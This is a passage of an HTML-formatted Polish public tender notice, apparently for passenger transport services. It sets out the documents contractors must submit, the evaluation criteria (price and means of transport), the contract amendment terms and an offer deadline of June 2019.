postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1. W celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 3 ustawy pzpZamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżejoceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzieńzłożenia następujących oświadczeń lub dokumentów: 1) informacja z Krajowego Rejestru Karnegow zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy pzp, wystawiona nie wcześniej niż 6miesięcy przed upływem terminu składania ofert; 2) zaświadczenie właściwego naczelnika urzęduskarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione niewcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokumentpotwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym wsprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lubwstrzymanie w całości wykonania decyzji właściwego organu. 3) zaświadczenie właściwejterenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy RolniczegoUbezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega zopłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, żewykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz zewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawemzwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całościwykonania decyzji właściwego organu. 4) oświadczenie wykonawcy o braku wydania wobec niegoprawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniempodatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadkuwydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności tychnależności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumieniaw sprawie spłat tych należności; 5) oświadczenie wykonawcy o braku orzeczenia wobec niegotytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne; 6) odpis zwłaściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeliodrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstawwykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy pzp; 7) oświadczenie wykonawcy oniezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12stycznia 1991r. o podatkach i opłatach lokalnych (t. j. Dz. U. z 2018r. poz. 1445 ze zm.). 2. Wprzypadku wspólnego ubiegania się o zamówienie przez wykonawców, dokumenty wymienione wust. 1 pkt 1-7, składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumentyte potwierdzają brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazujebrak podstaw wykluczenia. 3. Wykonawca, który będzie polegał na zdolnościach technicznych lubzawodowych lub sytuacji ekonomicznej innych podmiotów na zasadach określonych w art. 22austawy pzp, składa w odniesieniu do tych podmiotów dokumenty wymienione w ust. 1 pkt 1-7.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1. W celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 ustawy pzpZamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzieńzłożenia następujących oświadczeń lub dokumentów: 1) aktualne zezwolenie lub licencję nazarobkowy przewóz osób wydane na podstawie art. 7 ust. 2 pkt 1 ustawy z dnia 6 września 2001r. otransporcie drogowym (t. j. Dz. U. z 2019r. poz. 58 ze zm.). W przypadku gdy zezwolenie lublicencja nie jest wymagana - stosowne oświadczenie. 2) wykaz usług wykonanych, a w przypadkuświadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przedupływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tymokresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz którychusługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonanelub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź innedokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadkuświadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny oobiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczeniewykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencjebądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane niewcześniej niż 3 miesiące przed upływem terminu składania ofert. Wykaz, o którym mowa powyżejmusi potwierdzać spełnianie warunku udziału w postępowaniu określonego przez Zamawiającegow Sekcji III.1.3) pkt 1 i zostać sporządzony według wzoru stanowiącego Załącznik Nr 6 do siwz. 2)Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wszczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ichkwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonaniazamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją opodstawie do dysponowania tymi osobami. Wykaz, o którym mowa powyżej musi potwierdzaćspełnianie warunku udziału w postępowaniu określonego przez Zamawiającego w Sekcji III.1.3)pkt 3 i zostać sporządzony według wzoru stanowiącego Załącznik Nr 8 do siwz. 3) Dokumentypotwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresieprowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określonąprzez Zamawiającego w Sekcji III.1.2)</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Wykaz dokumentów stanowiących ofertę: 1) Wypełniony formularz ofertowy stanowiący kartętytułową oferty, dostarczony Wykonawcom wraz z siwz (Załącznik Nr 1 do siwz) zawierający: a)nazwę (firma) i adres Wykonawcy, b) cenę oferty w złotych polskich, obliczoną zgodnie zpostanowieniami Rozdziału XVI siwz zatytułowanym ,,Opis sposobu obliczania ceny oferty", c)oświadczenie Wykonawcy, informujące zamawiającego, czy wybór oferty będzie prowadzić dopowstania u zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów iusług, ze wskazaniem nazwy usługi, których świadczenie będzie prowadzić do jego powstania, orazich wartości bez kwoty podatku, d) termin wykonania zamówienia publicznego, e) wykazpojazdów, będących w posiadaniu/dysponowaniu Wykonawcy przez cały okres realizacji umowy -wykaz, o którym mowa powyżej, stanowi treść oferty podlegającą ocenie i jednocześnie musipotwierdzać spełnianie warunku udziału w postępowaniu określonego przez Zamawiającego wRozdziale VI ust. 3 pkt 2. Wykaz pojazdów musi zostać sporządzony według wzoru stanowiącegoZałącznik Nr 7 do siwz. f) warunki płatności, a) oświadczenie Wykonawcy, informującezamawiającego, czy zamierza powierzyć podwykonawcy wykonanie części zamówienia, zewskazaniem części zamówienia, których wykonanie zamierza powierzyć podwykonawcom ipodaniem firm podwykonawców, b) oświadczenie Wykonawcy w zakresie wypełnieniaobowiązków informacyjnych wynikających z RODO. 2) Wypełniony Załącznik Nr 3 do siwzzawierający obliczenie oferowanej ceny realizacji zamówienia (obliczoną wraz z podatkiem odtowarów i usług VAT) według sposobu obliczenia oferowanej ceny określonego w Rozdziale XVIsiwz zatytułowanym ,,Opis sposobu obliczania ceny oferty". 2. Wykaz oświadczeń i dokumentówdołączonych do oferty: 1) Pełnomocnictwa udzielane osobom podpisującym dokumenty ofertowe,o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost zdokumentu rejestrowego złożone w formie oryginału lub kopii poświadczonej za zgodność zoryginałem przez notariusza. 2) W przypadku wspólnego ubiegania się o zamówienie przezwykonawców, oświadczenia, o których mowa w Sekcji III.3) składa każdy z wykonawcówwspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunkówudziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy zwykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstawwykluczenia. 3) Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazaniabraku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje sięna ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach woświadczeniu Wykonawcy, o którym mowa w Sekcji III.3).4) Wykonawca, który będzie polegał nazdolnościach technicznych lub zawodowych lub sytuacji innych podmiotów na zasadachokreślonych w art. 22a ustawy pzp, w celu wykazania spełnienia warunków udziału w postępowaniu określonych w Sekcji III.1.2) i III.1.3), musi udowodnić zamawiającemu, żerealizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, wszczególności przedstawiając konkretne i czytelne zobowiązanie tych podmiotów do oddania mu dodyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Niezbędne jest abyzobowiązanie, o którym mowa powyżej zawierało informacje które określają: a) zakres dostępnychwykonawcy zasobów innego podmiotu, b) sposób wykorzystania zasobów innego podmiotu, przezwykonawcę, przy wykonywaniu zamówienia publicznego, c) zakres i okres udziału innegopodmiotu przy wykonywaniu zamówienia publicznego, d) czy podmiot, na zdolnościach któregowykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczącychwykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazanezdolności dotyczą. 3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytoriumRzeczypospolitej Polskiej, a także w przypadku Wykonawcy, mającego siedzibę na terytoriumRzeczypospolitej Polskiej, którego urzędujący członek organu zarządzającego lub nadzorczego,wspólnik spółki w spółce jawnej lub partnerskiej albo komplementariusz w spółce komandytowejlub komandytowo-akcyjnej lub prokurent, ma miejsce zamieszkania poza terytoriumRzeczypospolitej Polskiej, w odniesieniu do wymaganych dokumentów, stosuje się przepisy rozporządzenia Ministra Rozwoju z 26 lipca 2016 roku w sprawie rodzajów dokumentów, jakichmoże żądać Zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U z2016r. poz. 1126 ze zm.). 4. Wykonawca, w terminie 3 dni od zamieszczenia na stronieinternetowej informacji, o której mowa w art. 86 ust. 5 ustawy pzp, przekaże Zamawiającemuoświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o którejmowa w art. 24 ust. 1 pkt 23 ustawy pzp. Wraz ze złożeniem oświadczenia, wykonawca możeprzedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencjiw postępowaniu o udzielenie zamówienia. W przypadku wspólnego ubiegania się o zamówienieprzez wykonawców, oświadczenie, o którym mowa powyżej, składa każdy z wykonawcówwspólnie ubiegających się o zamówienie.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Środki transportu</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Wszelkie zmiany i uzupełnienia niniejszej Umowy mogą być dokonywane wyłącznie w formie pisemnej pod rygorem nieważności.2.	Strony dopuszczają możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy w następujących przypadkach:1)	przejścia na następców prawnych praw i obowiązków Wykonawcy, w tym wynikających z niniejszej Umowy, na podstawie pisemnego wniosku Wykonawcy, który wymaga akceptacji Zamawiającego, z tym zastrzeżeniem, iż zmiana umowy w takim przypadku dotyczy tylko zmiany oznaczenia Wykonawcy z zachowaniem pozostałych postanowień umowy,2)	zmiany w oznaczeniu firmy (nazwy) Wykonawcy, na podstawie pisemnego wniosku Wykonawcy, który wymaga akceptacji Zamawiającego, z tym zastrzeżeniem, iż zmiana umowy w takim przypadku dotyczy tylko zmiany oznaczenia Wykonawcy z zachowaniem pozostałych postanowień umowy,3)	nastąpi zmiana stawki podatku VAT dla usługi będącej przedmiotem niniejszej umowy - zmiana ceny jednostkowej brutto nastąpi z dniem wejścia w życie aktu prawnego zmieniającego stawkę, cena jednostkowa netto pozostanie bez zmian,4)	w przypadkach opisanych w § 4 ust. 4 niniejszej umowy,5)	w przypadkach opisanych w § 5 ust. 2 niniejszej umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-06-26</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> 